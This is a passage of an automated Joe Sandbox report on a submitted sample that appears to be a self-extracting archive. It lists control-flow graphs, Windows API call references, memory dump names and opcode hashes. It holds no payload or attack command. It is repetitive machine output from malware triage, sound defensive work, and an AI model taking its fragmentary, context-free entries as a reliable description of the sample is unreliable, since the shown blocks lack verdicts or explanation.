                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                        • String ID: EDIT
                                                                                        • API String ID: 4243998846-3080729518
                                                                                        • Opcode ID: f43f750cca0b0e55427dd0cbc9ea93283e7354014f95c02292c07e5190f386ae
                                                                                        • Instruction ID: 32735b16bdbb3ae793bb6a85f9ac98d3705dbb24da5ef0637dcb757d9570b23f
                                                                                        • Opcode Fuzzy Hash: f43f750cca0b0e55427dd0cbc9ea93283e7354014f95c02292c07e5190f386ae
                                                                                        • Instruction Fuzzy Hash: A1F08233601628B6DB3257649C09F9F766C9B86B40F498011BA49E6180D764EA4186B6
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 1073 37dbde-37dc09 call 37ec50 SetEnvironmentVariableW call 370371 1077 37dc0e-37dc12 1073->1077 1078 37dc36-37dc38 1077->1078 1079 37dc14-37dc18 1077->1079 1080 37dc21-37dc28 call 37048d 1079->1080 1083 37dc1a-37dc20 1080->1083 1084 37dc2a-37dc30 SetEnvironmentVariableW 1080->1084 1083->1080 1084->1078
                                                                                        APIs
                                                                                        • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0037DBF4
                                                                                        • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0037DC30
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnvironmentVariable
                                                                                        • String ID: sfxcmd$sfxpar
                                                                                        • API String ID: 1431749950-3493335439
                                                                                        • Opcode ID: f5fefc7dd55c0db0b1388f66141e8b82162b7eb66053886d08e84e68d795f2e1
                                                                                        • Instruction ID: 29e16d11330bc9cb8d5e60565f51ee244c81ab2deff4864637d489bfb4a61f46
                                                                                        • Opcode Fuzzy Hash: f5fefc7dd55c0db0b1388f66141e8b82162b7eb66053886d08e84e68d795f2e1
                                                                                        • Instruction Fuzzy Hash: 49F0ECB2404225A7DF333F958C46BFA376CAF04785B044455FD8D99161E6B98980D7B0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 1085 369785-369791 1086 369793-36979b GetStdHandle 1085->1086 1087 36979e-3697b5 ReadFile 1085->1087 1086->1087 1088 3697b7-3697c0 call 3698bc 1087->1088 1089 369811 1087->1089 1093 3697c2-3697ca 1088->1093 1094 3697d9-3697dd 1088->1094 1091 369814-369817 1089->1091 1093->1094 1095 3697cc 1093->1095 1096 3697ee-3697f2 1094->1096 1097 3697df-3697e8 GetLastError 1094->1097 1098 3697cd-3697d7 call 369785 1095->1098 1100 3697f4-3697fc 1096->1100 1101 36980c-36980f 1096->1101 1097->1096 1099 3697ea-3697ec 1097->1099 1098->1091 1099->1091 1100->1101 1103 3697fe-369807 GetLastError 1100->1103 1101->1091 1103->1101 1105 369809-36980a 1103->1105 1105->1098
                                                                                        APIs
                                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00369795
                                                                                        • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 003697AD
                                                                                        • GetLastError.KERNEL32 ref: 003697DF
                                                                                        • GetLastError.KERNEL32 ref: 003697FE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$FileHandleRead
                                                                                        • String ID:
                                                                                        • API String ID: 2244327787-0
                                                                                        • Opcode ID: 8865c3d6bc2f707be0b3d623be98b70364e6eb0f97b9e0ecdf71d3d0d0701806
                                                                                        • Instruction ID: 967dc699e623174b825fd429787f518f1266d0e1be50430a78f28f718e414137
                                                                                        • Opcode Fuzzy Hash: 8865c3d6bc2f707be0b3d623be98b70364e6eb0f97b9e0ecdf71d3d0d0701806
                                                                                        • Instruction Fuzzy Hash: 74117C30910204EBDF225F64C804B693BADBB52364F11C92BE42786698D7759E44DB61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,003840EF,00000000,00000000,?,0038ACDB,003840EF,00000000,00000000,00000000,?,0038AED8,00000006,FlsSetValue), ref: 0038AD66
                                                                                        • GetLastError.KERNEL32(?,0038ACDB,003840EF,00000000,00000000,00000000,?,0038AED8,00000006,FlsSetValue,00397970,FlsSetValue,00000000,00000364,?,003898B7), ref: 0038AD72
                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0038ACDB,003840EF,00000000,00000000,00000000,?,0038AED8,00000006,FlsSetValue,00397970,FlsSetValue,00000000), ref: 0038AD80
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                        • String ID:
                                                                                        • API String ID: 3177248105-0
                                                                                        • Opcode ID: 69f37045b6a9aae892b1241cf1ccf9cb4d5dc9edb00c3f0b77d7b48a5fbe640a
                                                                                        • Instruction ID: 65505b8a6308959c17af99b6e6f987517b94ab0bba0fbef81e1efc3fda9e50e0
                                                                                        • Opcode Fuzzy Hash: 69f37045b6a9aae892b1241cf1ccf9cb4d5dc9edb00c3f0b77d7b48a5fbe640a
                                                                                        • Instruction Fuzzy Hash: 49014736201B22ABD7235B68DC54A977B9CEF017A2B220662F906D3660C722DC09C7E1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 003897E5: GetLastError.KERNEL32(?,003A1098,00384674,003A1098,?,?,003840EF,?,?,003A1098), ref: 003897E9
                                                                                          • Part of subcall function 003897E5: _free.LIBCMT ref: 0038981C
                                                                                          • Part of subcall function 003897E5: SetLastError.KERNEL32(00000000,?,003A1098), ref: 0038985D
                                                                                          • Part of subcall function 003897E5: _abort.LIBCMT ref: 00389863
                                                                                          • Part of subcall function 0038BB4E: _abort.LIBCMT ref: 0038BB80
                                                                                          • Part of subcall function 0038BB4E: _free.LIBCMT ref: 0038BBB4
                                                                                          • Part of subcall function 0038B7BB: GetOEMCP.KERNEL32(00000000,?,?,0038BA44,?), ref: 0038B7E6
                                                                                        • _free.LIBCMT ref: 0038BA9F
                                                                                        • _free.LIBCMT ref: 0038BAD5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorLast_abort
                                                                                        • String ID: p9
                                                                                        • API String ID: 2991157371-1904256876
                                                                                        • Opcode ID: d5b9743be0a647d531717e361829722d61082cca857472ec6b5a934df3aa554f
                                                                                        • Instruction ID: 62eea3126074b3945908e62a9fa0cd2e2dcd882ad07054224f9047ec0b8eaaa7
                                                                                        • Opcode Fuzzy Hash: d5b9743be0a647d531717e361829722d61082cca857472ec6b5a934df3aa554f
                                                                                        • Instruction Fuzzy Hash: A531813190434AAFDB16FFA8D441BADB7E5EF40320F2540DAE5149B2A2EB369D41DB50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • CreateThread.KERNELBASE(00000000,00010000,Function_00011160,?,00000000,00000000), ref: 00371043
                                                                                        • SetThreadPriority.KERNEL32(?,00000000), ref: 0037108A
                                                                                          • Part of subcall function 00366C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00366C54
                                                                                          • Part of subcall function 00366DCB: _wcschr.LIBVCRUNTIME ref: 00366E0A
                                                                                          • Part of subcall function 00366DCB: _wcschr.LIBVCRUNTIME ref: 00366E19
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: Thread_wcschr$CreatePriority__vswprintf_c_l
                                                                                        • String ID: CreateThread failed
                                                                                        • API String ID: 2706921342-3849766595
                                                                                        • Opcode ID: a92ba2e32fcf3ec33d99d3ceb8c0fa08b8680a799f80d8ff7d32dd09c3926542
                                                                                        • Instruction ID: 8111aeb1f1fb66788c6c5d643f070ed42a21f2646c2df8c805eceb0b8759c50e
                                                                                        • Opcode Fuzzy Hash: a92ba2e32fcf3ec33d99d3ceb8c0fa08b8680a799f80d8ff7d32dd09c3926542
                                                                                        • Instruction Fuzzy Hash: FE01AEB63443496FD7379F689C92F77735CEB41751F10402EF58756284CEA16C854624
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E51F
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: 27$PDu<7
                                                                                        • API String ID: 1269201914-895419741
                                                                                        • Opcode ID: b13ffe9f40dfeb83c164d61366327faa248e8ccd9a00855aac5648b0c8c7161d
                                                                                        • Instruction ID: e754d97d50ddcf497246f5aecd55ba9d29706f674bd3a98891bee039a0d429ff
                                                                                        • Opcode Fuzzy Hash: b13ffe9f40dfeb83c164d61366327faa248e8ccd9a00855aac5648b0c8c7161d
                                                                                        • Instruction Fuzzy Hash: 0FB012CB2680007D321761081D02F7B021CC0CAF20330D06EF42DC4480E8444C000533
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E51F
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: (7$PDu<7
                                                                                        • API String ID: 1269201914-270680953
                                                                                        • Opcode ID: 0a1e46f7b389dfcf375f5eeb5fa34b4499e1e6c737d2e5ee11e401bde62508ca
                                                                                        • Instruction ID: e6849191d093bfce8e9202c78f756fff82d87949da97d0c262123808e55bb0cc
                                                                                        • Opcode Fuzzy Hash: 0a1e46f7b389dfcf375f5eeb5fa34b4499e1e6c737d2e5ee11e401bde62508ca
                                                                                        • Instruction Fuzzy Hash: 35B012CB2680407C321761081E02E3B071CC0CAF20330D06EF42DC4480E8454C010533
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetStdHandle.KERNEL32(000000F5,?,?,?,?,0036D343,00000001,?,?,?,00000000,0037551D,?,?,?), ref: 00369F9E
                                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,0037551D,?,?,?,?,?,00374FC7,?), ref: 00369FE5
                                                                                        • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0036D343,00000001,?,?), ref: 0036A011
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileWrite$Handle
                                                                                        • String ID:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 0036C27E: _wcslen.LIBCMT ref: 0036C284
                                                                                        • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0036A175,?,00000001,00000000,?,?), ref: 0036A2D9
                                                                                        • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0036A175,?,00000001,00000000,?,?), ref: 0036A30C
                                                                                        • GetLastError.KERNEL32(?,?,?,?,0036A175,?,00000001,00000000,?,?), ref: 0036A329
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: CreateDirectory$ErrorLast_wcslen
                                                                                        • String ID:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0038B8B8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: Info
                                                                                        • String ID:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,000000FF), ref: 0038AFDD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: String
                                                                                        • String ID: LCMapStringEx
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0038A56F), ref: 0038AF55
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: CountCriticalInitializeSectionSpin
                                                                                        • String ID: InitializeCriticalSectionEx
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: Alloc
                                                                                        • String ID: FlsAlloc
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: 7
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: 7
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: 7
                                                                                        • API String ID: 1269201914-626684421
                                                                                        • Opcode ID: 8e2479b1ddad2ac4db297b35611ae329bc9f518b25944794cf568737beda1a6f
                                                                                        • Instruction ID: bebc4bbc424628a5915c9e1aab729a6abe3e771f00f98417f2a9b99cbeebba6f
                                                                                        • Opcode Fuzzy Hash: 8e2479b1ddad2ac4db297b35611ae329bc9f518b25944794cf568737beda1a6f
                                                                                        • Instruction Fuzzy Hash: 77B012D92A8100BC3217B1865C03D37011CC1CAF10330C47EFC29D4880D844AC000432
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: 7
                                                                                        • API String ID: 1269201914-626684421
                                                                                        • Opcode ID: c6d2251eae41b9967fae8c8f300cdd967e1d48ee9cd2625c0ea871cfb5f5d948
                                                                                        • Instruction ID: 6b3531876b771359fa0777813345a643f316a81e8f8311e74bde98e97b18693d
                                                                                        • Opcode Fuzzy Hash: c6d2251eae41b9967fae8c8f300cdd967e1d48ee9cd2625c0ea871cfb5f5d948
                                                                                        • Instruction Fuzzy Hash: CFB012E5268000BC3217E1475D03E37010CC1C9F10330C07EF82DC5480DC446E010532
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: 7
                                                                                        • API String ID: 1269201914-626684421
                                                                                        • Opcode ID: c9188a45c8e064b2d8d48714890acd7498231d413178f429f35d17037d7cb8e7
                                                                                        • Instruction ID: 8d4d1463e9f7f06351a67ed05e6c72ceb2a1c901d4c2a13da5d6de9051315496
                                                                                        • Opcode Fuzzy Hash: c9188a45c8e064b2d8d48714890acd7498231d413178f429f35d17037d7cb8e7
                                                                                        • Instruction Fuzzy Hash: 1EB012E5268000BC3217E1475C03E77010CC1C9F10330C07EF82DC5480D8446D000532
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
